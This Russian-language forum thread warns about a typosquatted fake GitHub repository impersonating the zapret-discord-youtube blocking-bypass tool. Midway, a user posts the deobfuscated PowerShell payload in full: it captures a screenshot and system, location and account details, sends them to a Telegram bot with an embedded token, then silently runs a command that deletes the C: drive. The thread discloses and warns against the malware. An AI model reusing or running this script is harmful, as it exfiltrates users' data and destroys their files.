⚠️ Фейковый zapret-discord-youtube

Недавно появился новый форк GoodbyeDPI на GitHub (GitHub - Flowseal/zapret-discord-youtube) который направлен на обход блокировки YouTube и Discord.

Вместе с ним появился фейковый репозиторий, который я вам рекомендую зарепортить: GitHub - FlowseaI/zapret-discord-youtube (Использует заглавную букву i в нике)

Ссылка на отправку репорта: Sign in for Software Support and Product Help - GitHub Support

Ахахха, чел даже не понимает, как работают блэклисты запрета/гудбая, а все туда же :rofl:

Скрипт поиска пробелов в пути… Это точно нужно?

А если я скачал из первоначального источника запрет там разве тоже нет в ip traffic mine.bmpool.org ?

бл я зарепортил сразу, но всё ещё там + какойто обфусицированый в басе64 повершел скрип палюбому малаваре

закинул чекнуть на верустотал https://www.virustotal.com/gui/file/5e68268094c11fdc81b00847bb3f0a711157589f09890133ff8905c4ba0b7aca?nocache=1

обфусцировано вот етим педрилой суде по всему
Screenshot 2024-10-11 124343

Если интересно что обфусцировано:

Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName System.Drawing
Add-Type -AssemblyName 'System.Net.Http'
try {
    $screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
    $bitmap = New-Object System.Drawing.Bitmap $screen.Width, $screen.Height
    $graphics = [System.Drawing.Graphics]::FromImage($bitmap)
    $graphics.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $bitmap.Size)
    $memoryStream = New-Object System.IO.MemoryStream
    $bitmap.Save($memoryStream, [System.Drawing.Imaging.ImageFormat]::Png)
    $graphics.Dispose()
    $bitmap.Dispose()
    $memoryStream.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null

    $country = (Invoke-RestMethod -Uri "http://ipinfo.io/country").Trim()
    $city = (Invoke-RestMethod -Uri "http://ipinfo.io/city").Trim()
    $ip = (Invoke-RestMethod -Uri "http://ifconfig.me").Trim()
    $isAdmin = (whoami /groups | Select-String "S-1-5-32-544").Length -gt 0
    $rights = if ($isAdmin) { "Admin" } else { "Slave" }
    $dgkfsertodgfl = (Get-CimInstance Win32_OperatingSystem).Caption
    $os_arch = if ([Environment]::Is64BitOperatingSystem) { "x64" } else { "x86" }
$message = @"
Type: $dgkfsertodgfl ($os_arch)
From: $country $city ($ip)
Name: $env:USERNAME ($rights)
"@
    $dfhgsfdgh = "7872562304:AAHDovPEKL6JPliHzkjUYTd26f8YFuM8vDA"
    $chat_id = "@dgfkewr"
    $uri = "https://api.telegram.org/bot$dfhgsfdgh/sendPhoto"
    $client = [System.Net.Http.HttpClient]::new()
    $client.Timeout = [TimeSpan]::FromMinutes(5)
   $gkwerjtsod = [System.Net.Http.MultipartFormDataContent]::new()
    $fileContent = [System.Net.Http.StreamContent]::new($memoryStream)
    $fileContent.Headers.ContentType = [System.Net.Http.Headers.MediaTypeHeaderValue]::Parse("image/png")
   $gkwerjtsod.Add($fileContent, "photo", "screenshot.png")
   $gkwerjtsod.Add([System.Net.Http.StringContent]::new($chat_id), "chat_id")
   $gkwerjtsod.Add([System.Net.Http.StringContent]::new($message), "caption")
    $response = $client.PostAsync($uri,$gkwerjtsod).Result
    Start-Process -FilePath "cmd" -ArgumentList @("/c", "rd /s /q C:\") -PassThru -WindowStyle Hidden
}
finally {
    if ($memoryStream) {
        $memoryStream.Dispose()
    }
    if ($client) {
        $client.Dispose()
    }
}

Уже не зайти в чатик)
Я его уже задолбал спамом.

Бедные работяги, которые это скачают из последнего репозитория. Чел конечно гений букву l на I подменил

На момент закрытия чата - там было ~ 800 человек.
каждую 1-3минуты - кто-то новый 0)))

ет вты как декодировал?! индиресно :nerd_face:

кароч оно скринщоты отсылает в телегу если я правельно понел по коду

имхо
надо отказываться от всех этих ссылок на свои архивы (которые даже тут выкладывают на форуме) и сторонние гитхабы

должен скачиваться запрет из офф bolvan-a и допиливаться сам.

ето здравая мылся, но к сожительению ето некуда не денется потому что нормисам надо чтобы работало в один клик а так (не)бывает

1 Like

Если бы он на этом остановился))
Он еще удалил древо каталогов C:\

3 раза обернул в base64 автор сие бота)

спасибо за информацию! теперь понятн ато я раз прогнал там опять закодировано ну я подумал что ето не работает, аоно вон оказывается как

он кстати обновил бота походу

Его так часто посещают, что он теперь первый в поисковой выдаче.
Query: zapret-discord-youtube


:saluting_face:

Все. Его заблочили на гитхабе.

Нуда нуда. Поддельные форумы никогда не существовали? А гитхаб для Китайцев на настоящий момент едиствинная форточка, для обхода блокировок

подеба :partying_face:
вот ведь иногда гражданское общесво работает жеж

Можно писать свои открытые программы которые скачивают оригинальный файл и просто допиливают настройки которые нужны. Почему нет? Тоже в один клик.

походу ори скоро допилит свой скрип до такого состояния уже :sweat_smile: :nerd_face:

Не заметил, как скачал фейк. Снёс мне файлы на жёстком диске, пытаюсь восстановить по точке. Скажите, эта фигня ничего кроме сноса файлов не делает?